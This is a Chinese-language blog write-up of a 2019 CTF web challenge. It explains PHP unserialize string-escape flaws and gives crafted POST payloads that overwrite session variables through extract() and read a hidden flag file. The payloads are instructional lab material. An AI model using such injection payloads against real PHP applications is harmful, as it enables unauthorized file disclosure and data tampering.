<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.3.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"123-prog.github.io","root":"/","scheme":"Gemini","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"always","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="0x01 关于反序列化漏洞中的字符逃逸有两种，一种是经过字符串替换导致序列化的字符串变长，还有一种是经过字符串替代后序列化字符串变短，两种都是因为在序列化后，对序列化的字符串进行了过滤，对其中的敏感字符进行替代，原本是对用户的输入进行过滤，现在反倒出现了可以利用的机会">
<meta property="og:type" content="article">
<meta property="og:title" content="安洵杯 2019 easy_serialize_php">
<meta property="og:url" content="https://123-prog.github.io/2021/01/24/%E5%AE%89%E6%B4%B5%E6%9D%AF-2019-easy-serialize-php/index.html">
<meta property="og:site_name" content="nappingCat&#39;s Blog">
<meta property="og:description" content="0x01 关于反序列化漏洞中的字符逃逸有两种，一种是经过字符串替换导致序列化的字符串变长，还有一种是经过字符串替代后序列化字符串变短，两种都是因为在序列化后，对序列化的字符串进行了过滤，对其中的敏感字符进行替代，原本是对用户的输入进行过滤，现在反倒出现了可以利用的机会">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://123-prog.github.io/2021/01/24/%E5%AE%89%E6%B4%B5%E6%9D%AF-2019-easy-serialize-php/Snipaste_2021-01-24_12-18-59.png">
<meta property="og:image" content="https://123-prog.github.io/2021/01/24/%E5%AE%89%E6%B4%B5%E6%9D%AF-2019-easy-serialize-php/Snipaste_2021-01-24_11-31-58.png">
<meta property="og:image" content="https://123-prog.github.io/2021/01/24/%E5%AE%89%E6%B4%B5%E6%9D%AF-2019-easy-serialize-php/Snipaste_2021-01-24_12-40-15.png">
<meta property="article:published_time" content="2021-01-24T03:31:42.000Z">
<meta property="article:modified_time" content="2021-04-05T02:34:58.400Z">
<meta property="article:author" content="nappingCat">
<meta property="article:tag" content="php代码审计 反序列化漏洞">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://123-prog.github.io/2021/01/24/%E5%AE%89%E6%B4%B5%E6%9D%AF-2019-easy-serialize-php/Snipaste_2021-01-24_12-18-59.png">

<link rel="canonical" href="https://123-prog.github.io/2021/01/24/%E5%AE%89%E6%B4%B5%E6%9D%AF-2019-easy-serialize-php/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'en'
  };
</script>

  <title>安洵杯 2019 easy_serialize_php | nappingCat's Blog</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="Toggle navigation bar">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">nappingCat's Blog</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>Home</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>Archives</a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="en">
    <link itemprop="mainEntityOfPage" href="https://123-prog.github.io/2021/01/24/%E5%AE%89%E6%B4%B5%E6%9D%AF-2019-easy-serialize-php/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="nappingCat">
      <meta itemprop="description" content="2571374157@qq.com">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="nappingCat's Blog">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          安洵杯 2019 easy_serialize_php
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">Posted on</span>

              <time title="Created: 2021-01-24 11:31:42" itemprop="dateCreated datePublished" datetime="2021-01-24T11:31:42+08:00">2021-01-24</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">Edited on</span>
                <time title="Modified: 2021-04-05 10:34:58" itemprop="dateModified" datetime="2021-04-05T10:34:58+08:00">2021-04-05</time>
              </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h3 id="0x01-关于反序列化漏洞中的字符逃逸"><a href="#0x01-关于反序列化漏洞中的字符逃逸" class="headerlink" title="0x01 关于反序列化漏洞中的字符逃逸"></a><strong>0x01 关于反序列化漏洞中的字符逃逸</strong></h3><p>有两种，一种是经过字符串替换导致序列化的字符串变长，还有一种是经过字符串替代后序列化字符串变短，两种都是因为在序列化后，对序列化的字符串进行了过滤，对其中的敏感字符进行替代，原本是对用户的输入进行过滤，现在反倒出现了可以利用的机会</p>
<a id="more"></a>

<h4 id="1-字符串膨胀导致的字符逃逸"><a href="#1-字符串膨胀导致的字符逃逸" class="headerlink" title="1.字符串膨胀导致的字符逃逸"></a>1.字符串膨胀导致的字符逃逸</h4><p>测试程序：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">filter</span>(<span class="params"><span class="variable">$str</span></span>)</span>&#123;</span><br><span class="line">	<span class="keyword">return</span> preg_replace(<span class="string">&#x27;/x/&#x27;</span>, <span class="string">&#x27;xx&#x27;</span>, <span class="variable">$str</span>);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="variable">$username</span> = <span class="variable">$_GET</span>[<span class="string">&#x27;name&#x27;</span>];</span><br><span class="line"><span class="variable">$password</span> = <span class="string">&#x27;123456&#x27;</span>;</span><br><span class="line"><span class="variable">$user_info</span> = <span class="keyword">array</span>(<span class="string">&#x27;name&#x27;</span>=&gt; <span class="variable">$username</span>, <span class="string">&#x27;pwd&#x27;</span>=&gt;<span class="variable">$password</span>);</span><br><span class="line"></span><br><span class="line"><span class="variable">$serialize_info</span> = serialize(<span class="variable">$user_info</span>);</span><br><span class="line"><span class="variable">$serialize_info</span> = filter(<span class="variable">$serialize_info</span>);</span><br><span class="line"><span class="keyword">echo</span> <span class="variable">$serialize_info</span>;</span><br><span class="line"><span class="keyword">echo</span> <span class="string">&#x27;&lt;br&gt;&#x27;</span>;</span><br><span class="line"><span class="variable">$user</span> = unserialize(<span class="variable">$serialize_info</span>);</span><br><span class="line"><span class="keyword">echo</span> <span class="variable">$user</span>[<span class="string">&#x27;name&#x27;</span>];</span><br><span class="line"><span class="keyword">echo</span> <span class="string">&#x27;&lt;br&gt;&#x27;</span>;</span><br><span class="line"><span class="keyword">echo</span> <span class="variable">$user</span>[<span class="string">&#x27;pwd&#x27;</span>];</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>
<p>我在本地的测试环境是php5.4.45，题目是php7.0.33，好像有些低版本会对序列化字符串中的双引号进行转义，导致测试失败，但我在php5.4.45经过测试，可以利用</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">1.正常情况下：</span><br><span class="line">http:&#x2F;&#x2F;localhost&#x2F;test&#x2F;3.php?name&#x3D;mySh1ft</span><br><span class="line">输出：</span><br><span class="line">a:2:&#123;s:4:&quot;name&quot;;s:7:&quot;mySh1ft&quot;;s:3:&quot;pwd&quot;;s:6:&quot;123456&quot;;&#125;</span><br><span class="line">mySh1ft</span><br><span class="line">123456</span><br><span class="line">2.当我输入的参数name中带有x,过滤后就会出现问题，下面是利用方式</span><br><span class="line">http:&#x2F;&#x2F;localhost&#x2F;test&#x2F;3.php?name&#x3D;xxxxxxxxxxxxxxxxxxxxxxxxxx&quot;;s:3:&quot;pwd&quot;;s:6:&quot;654321&quot;;&#125;</span><br><span class="line">输出：</span><br><span class="line">a:2：&#123;s:4:&quot;name&quot;;s:52:&quot;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx&quot;;s:3:&quot;pwd&quot;;s:6:&quot;654321&quot;;&#125;&quot;;s:3:&quot;pwd&quot;;s:6:&quot;123456&quot;;&#125;</span><br><span class="line">xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx</span><br><span class="line">654321</span><br><span class="line"></span><br></pre></td></tr></table></figure>
<p>a:2：{s:4:”name”;s:52:”<strong><em>xxxxxxxxxxxxxxxxxxxxxxxxxx”;s:3:”pwd”;s:6:”654321”;}</em></strong>“;s:3:”pwd”;s:6:”123456”;}</p>
<p>a:2：{s:4:”name”;s:52:”<strong><em>xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx</em></strong>“;s:3:”pwd”;s:6:”654321”;}”;s:3:”pwd”;s:6:”123456”;}</p>
<p>原本52个字符应该包括上面加粗部分，但现在x被替换成xx,原本26个x刚好凑成52个字符，导致后面的部分逃逸，我们就可以通过name变量控制pwd变量，将pwd从123456改成654321，unserialize()函数在遇到;}时就会停止反序列化，后面的不会生效。</p>
<h4 id="2-字符串缩短导致的字符逃逸"><a href="#2-字符串缩短导致的字符逃逸" class="headerlink" title="2.字符串缩短导致的字符逃逸"></a>2.字符串缩短导致的字符逃逸</h4><p>测试程序：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span> </span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">filter</span>(<span class="params"><span class="variable">$str</span></span>)</span>&#123;</span><br><span class="line">	<span class="keyword">return</span> preg_replace(<span class="string">&#x27;/flag/&#x27;</span>, <span class="string">&#x27;&#x27;</span>, <span class="variable">$str</span>);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="variable">$username</span> = <span class="variable">$_GET</span>[<span class="string">&#x27;name&#x27;</span>];</span><br><span class="line"><span class="variable">$password</span> = <span class="variable">$_GET</span>[<span class="string">&#x27;pwd&#x27;</span>];</span><br><span class="line"><span class="variable">$money</span> = <span class="string">&#x27;111111&#x27;</span>;</span><br><span class="line"><span class="variable">$user_info</span> = <span class="keyword">array</span>(<span class="string">&#x27;name&#x27;</span>=&gt; <span class="variable">$username</span>, <span class="string">&#x27;pwd&#x27;</span>=&gt;<span class="variable">$password</span>,<span class="string">&#x27;money&#x27;</span>=&gt;<span class="variable">$money</span>);</span><br><span class="line"></span><br><span class="line"><span class="variable">$serialize_info</span> = serialize(<span class="variable">$user_info</span>);</span><br><span class="line"><span class="variable">$serialize_info</span> = filter(<span class="variable">$serialize_info</span>);</span><br><span class="line"><span class="keyword">echo</span> <span class="variable">$serialize_info</span>;</span><br><span class="line"><span class="keyword">echo</span> <span class="string">&#x27;&lt;br&gt;&#x27;</span>;</span><br><span class="line"><span class="variable">$user</span> = unserialize(<span class="variable">$serialize_info</span>);</span><br><span class="line"><span class="keyword">echo</span> <span class="variable">$user</span>[<span class="string">&#x27;name&#x27;</span>];</span><br><span class="line"><span class="keyword">echo</span> <span class="string">&#x27;&lt;br&gt;&#x27;</span>;</span><br><span class="line"><span class="keyword">echo</span> <span class="variable">$user</span>[<span class="string">&#x27;pwd&#x27;</span>];</span><br><span class="line"><span class="keyword">echo</span> <span class="string">&#x27;&lt;br&gt;&#x27;</span>;</span><br><span class="line"><span class="keyword">echo</span> <span class="variable">$user</span>[<span class="string">&#x27;money&#x27;</span>];</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">1.正常情况：</span><br><span class="line">http:&#x2F;&#x2F;localhost&#x2F;test&#x2F;4.php?name&#x3D;mySh1ft&amp;pwd&#x3D;123456</span><br><span class="line">输出：</span><br><span class="line">a:3:&#123;s:4:&quot;name&quot;;s:7:&quot;mySh1ft&quot;;s:3:&quot;pwd&quot;;s:6:&quot;123456&quot;;s:5:&quot;money&quot;;s:6:&quot;111111&quot;;&#125;</span><br><span class="line">mySh1ft</span><br><span class="line">123456</span><br><span class="line">111111</span><br><span class="line">2.字符串存在敏感字符：</span><br><span class="line">http:&#x2F;&#x2F;localhost&#x2F;test&#x2F;4.php?name&#x3D;mySh1ftflagflagflagflagflag&amp;pwd&#x3D;12&quot;;s:3:&quot;pwd&quot;;s:6:&quot;123456&quot;;s:5:&quot;money&quot;;s:10:&quot;1111111111&quot;;&#125;3456</span><br><span class="line">输出：</span><br><span class="line">a:3:&#123;s:4:&quot;name&quot;;s:27:&quot;mySh1ft&quot;;s:3:&quot;pwd&quot;;s:62:&quot;12&quot;;s:3:&quot;pwd&quot;;s:6:&quot;123456&quot;;s:5:&quot;money&quot;;s:10:&quot;1111111111&quot;;&#125;3456&quot;;s:5:&quot;money&quot;;s:6:&quot;111111&quot;;&#125;</span><br><span class="line">mySh1ft&quot;;s:3:&quot;pwd&quot;;s:62:&quot;12</span><br><span class="line">123456</span><br><span class="line">1111111111</span><br><span class="line"></span><br></pre></td></tr></table></figure>
<p>原本应该是这样：</p>
<p>a:3:{s:4:”name”;s:27:”<strong><em>mySh1ftflagflagflagflagflag</em></strong>“;s:3:”pwd”;s:62:”<strong><em>12”;s:3:”pwd”;s:6:”123456”;s:5:”money”;s:10:”1111111111”;}3456</em></strong>“;s:5:”money”;s:6:”<strong><em>111111</em></strong>“;}</p>
<p>但字符串flag会被替换为空，结果变成这样：</p>
<p>a:3:{s:4:”name”;s:27:”<strong><em>mySh1ft”;s:3:”pwd”;s:62:”12</em></strong>“;s:3:”pwd”;s:6:”<strong><em>123456</em></strong>“;s:5:”money”;s:10:”<strong><em>1111111111</em></strong>“;}3456”;s:5:”money”;s:6:”111111”;}</p>
<p>在反序列化的时候，name有27个字符，但第一个双引号包括的只有7个字符，所以向后“吞噬”，我们计算后在合适的位置插入后面的序列化字符串，就可以达到改变后面变量的目的</p>
<h3 id="0x02-解题"><a href="#0x02-解题" class="headerlink" title="0x02 解题"></a><strong>0x02 解题</strong></h3><h4 id="1-源码："><a href="#1-源码：" class="headerlink" title="1.源码："></a>1.源码：</h4><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line"><span class="variable">$function</span> = @<span class="variable">$_GET</span>[<span class="string">&#x27;f&#x27;</span>];</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">filter</span>(<span class="params"><span class="variable">$img</span></span>)</span>&#123;</span><br><span class="line">    <span class="variable">$filter_arr</span> = <span class="keyword">array</span>(<span class="string">&#x27;php&#x27;</span>,<span class="string">&#x27;flag&#x27;</span>,<span class="string">&#x27;php5&#x27;</span>,<span class="string">&#x27;php4&#x27;</span>,<span class="string">&#x27;fl1g&#x27;</span>);</span><br><span class="line">    <span class="variable">$filter</span> = <span class="string">&#x27;/&#x27;</span>.implode(<span class="string">&#x27;|&#x27;</span>,<span class="variable">$filter_arr</span>).<span class="string">&#x27;/i&#x27;</span>;</span><br><span class="line">    <span class="keyword">return</span> preg_replace(<span class="variable">$filter</span>,<span class="string">&#x27;&#x27;</span>,<span class="variable">$img</span>);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(<span class="variable">$_SESSION</span>)&#123;</span><br><span class="line">    <span class="keyword">unset</span>(<span class="variable">$_SESSION</span>);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="variable">$_SESSION</span>[<span class="string">&quot;user&quot;</span>] = <span class="string">&#x27;guest&#x27;</span>;</span><br><span class="line"><span class="variable">$_SESSION</span>[<span class="string">&#x27;function&#x27;</span>] = <span class="variable">$function</span>;</span><br><span class="line"></span><br><span class="line">extract(<span class="variable">$_POST</span>);</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(!<span class="variable">$function</span>)&#123;</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">&#x27;&lt;a href=&quot;index.php?f=highlight_file&quot;&gt;source_code&lt;/a&gt;&#x27;</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(!<span class="variable">$_GET</span>[<span class="string">&#x27;img_path&#x27;</span>])&#123;</span><br><span class="line">    <span class="variable">$_SESSION</span>[<span class="string">&#x27;img&#x27;</span>] = base64_encode(<span class="string">&#x27;guest_img.png&#x27;</span>);</span><br><span class="line">&#125;<span class="keyword">else</span>&#123;</span><br><span class="line">    <span class="variable">$_SESSION</span>[<span class="string">&#x27;img&#x27;</span>] = sha1(base64_encode(<span class="variable">$_GET</span>[<span class="string">&#x27;img_path&#x27;</span>]));</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="variable">$serialize_info</span> = filter(serialize(<span class="variable">$_SESSION</span>));</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(<span class="variable">$function</span> == <span class="string">&#x27;highlight_file&#x27;</span>)&#123;</span><br><span class="line">    highlight_file(<span class="string">&#x27;index.php&#x27;</span>);</span><br><span class="line">&#125;<span class="keyword">else</span> <span class="keyword">if</span>(<span class="variable">$function</span> == <span class="string">&#x27;phpinfo&#x27;</span>)&#123;</span><br><span class="line">    <span class="keyword">eval</span>(<span class="string">&#x27;phpinfo();&#x27;</span>); <span class="comment">//maybe you can find something in here!</span></span><br><span class="line">&#125;<span class="keyword">else</span> <span class="keyword">if</span>(<span class="variable">$function</span> == <span class="string">&#x27;show_image&#x27;</span>)&#123;</span><br><span class="line">    <span class="variable">$userinfo</span> = unserialize(<span class="variable">$serialize_info</span>);</span><br><span class="line">    <span class="keyword">echo</span> file_get_contents(base64_decode(<span class="variable">$userinfo</span>[<span class="string">&#x27;img&#x27;</span>]));</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>分析，这里是过滤序列化字符串并将敏感词替换为空，所以是字符串的缩短导致的逃逸，extract()函数可以将数组中的值导入到当前的符号表，可以很容易处理post或get得到的数据而不用一个一个进行赋值，这也就代表我们可以通过post变量覆盖$_SESSION数组变量，从而控制变量</p>
<h4 id="2-查看phpinfo"><a href="#2-查看phpinfo" class="headerlink" title="2.查看phpinfo"></a>2.查看phpinfo</h4><p><img src="/2021/01/24/%E5%AE%89%E6%B4%B5%E6%9D%AF-2019-easy-serialize-php/Snipaste_2021-01-24_12-18-59.png"></p>
<p>可以看到这里自动包含了一个名为d0g3_f1ag.php的文件，接下来构造payload来查看这个文件内容</p>
<h4 id="3-构造payload"><a href="#3-构造payload" class="headerlink" title="3.构造payload"></a>3.构造payload</h4><p>为了方便构造序列化字符串，我在本地进行测试</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line"><span class="variable">$function</span> = @<span class="variable">$_GET</span>[<span class="string">&#x27;f&#x27;</span>];</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">filter</span>(<span class="params"><span class="variable">$img</span></span>)</span>&#123;</span><br><span class="line">    <span class="variable">$filter_arr</span> = <span class="keyword">array</span>(<span class="string">&#x27;php&#x27;</span>,<span class="string">&#x27;flag&#x27;</span>,<span class="string">&#x27;php5&#x27;</span>,<span class="string">&#x27;php4&#x27;</span>,<span class="string">&#x27;fl1g&#x27;</span>);</span><br><span class="line">    <span class="variable">$filter</span> = <span class="string">&#x27;/&#x27;</span>.implode(<span class="string">&#x27;|&#x27;</span>,<span class="variable">$filter_arr</span>).<span class="string">&#x27;/i&#x27;</span>;</span><br><span class="line">    <span class="keyword">return</span> preg_replace(<span class="variable">$filter</span>,<span class="string">&#x27;&#x27;</span>,<span class="variable">$img</span>);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="variable">$_SESSION</span>[<span class="string">&quot;user&quot;</span>] = <span class="string">&#x27;guest&#x27;</span>;</span><br><span class="line"><span class="variable">$_SESSION</span>[<span class="string">&#x27;function&#x27;</span>] = <span class="variable">$function</span>;</span><br><span class="line"></span><br><span class="line">extract(<span class="variable">$_POST</span>);</span><br><span class="line"></span><br><span class="line"><span class="variable">$serialize_info</span> = filter(serialize(<span class="variable">$_SESSION</span>));</span><br><span class="line"><span class="keyword">echo</span> <span class="variable">$serialize_info</span>.<span class="string">&#x27;&lt;br&gt;&#x27;</span>;</span><br><span class="line"><span class="variable">$userinfo</span> = unserialize(<span class="variable">$serialize_info</span>);</span><br><span class="line"><span class="keyword">echo</span> <span class="variable">$userinfo</span>[<span class="string">&#x27;function&#x27;</span>].<span class="string">&#x27;&lt;br&gt;&#x27;</span>;</span><br><span class="line"><span class="keyword">echo</span> base64_decode(<span class="variable">$userinfo</span>[<span class="string">&#x27;img&#x27;</span>]);</span><br></pre></td></tr></table></figure>
<p>post数据：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">_SESSION[user]&#x3D;guestflagflagflagflagflagphp&amp;_SESSION[function]&#x3D;&quot;;s:8:&quot;function&quot;;s:10:&quot;show_image&quot;;s:3:&quot;img&quot;;s:12:&quot;bXlTaDFmdA&#x3D;&#x3D;&quot;;&#125;show_image&amp;_SESSION[img]&#x3D;1</span><br></pre></td></tr></table></figure>
<p>数组内的key注意不用加引号<br>得到的输出：</p>
<p>a:3:{s:4:”user”;s:28:”<strong><em>guest”;s:8:”function”;s:76:”</em></strong>“;s:8:”function”;s:10:”show_image”;s:3:”img”;s:12:”bXlTaDFmdA==”;}show_image”;s:3:”img”;s:1:”1”;}<br>show_image<br>mySh1ft</p>
<p>现在已经可以控制img变量了，接下来就可以利用源码中的file_get_contents()函数查看我们需要文件的信息</p>
<p> post数据，注意要满足$function为show_image,所以应该在$_GET[‘f’]=show_image情况下post我们的变量</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">_SESSION[user]&#x3D;guestflagflagflagflagflagphp&amp;_SESSION[function]&#x3D;&quot;;s:8:&quot;function&quot;;s:10:&quot;show_image&quot;;s:3:&quot;img&quot;;s:20:&quot;ZDBnM19mMWFnLnBocA&#x3D;&#x3D;&quot;;&#125;show_image&amp;_SESSION[img]&#x3D;1</span><br></pre></td></tr></table></figure>
<p>“ZDBnM19mMWFnLnBocA==”是base64编码后的d0g3_f1ag.php</p>
<p>右键查看源码</p>
<p><img src="/2021/01/24/%E5%AE%89%E6%B4%B5%E6%9D%AF-2019-easy-serialize-php/Snipaste_2021-01-24_11-31-58.png"></p>
<p>更改img变量，查看flag</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">_SESSION[user]&#x3D;guestflagflagflagflagflagphp&amp;_SESSION[function]&#x3D;&quot;;s:8:&quot;function&quot;;s:10:&quot;show_image&quot;;s:3:&quot;img&quot;;s:20:&quot;L2QwZzNfZmxsbGxsbGFn&quot;;&#125;show_image&amp;_SESSION[img]&#x3D;1</span><br></pre></td></tr></table></figure>
<p><img src="/2021/01/24/%E5%AE%89%E6%B4%B5%E6%9D%AF-2019-easy-serialize-php/Snipaste_2021-01-24_12-40-15.png"></p>

    </div>

    
    
    

      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/php%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E/" rel="tag"># php代码审计 反序列化漏洞</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2021/01/20/BJDCTF2020-Easy-MD5/" rel="prev" title="BJDCTF2020 Easy MD5">
      <i class="fa fa-chevron-left"></i> BJDCTF2020 Easy MD5
    </a></div>
      <div class="post-nav-item">
    <a href="/2021/02/03/%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%98-2019-PHP/" rel="next" title="极客大挑战 2019 PHP">
      极客大挑战 2019 PHP <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
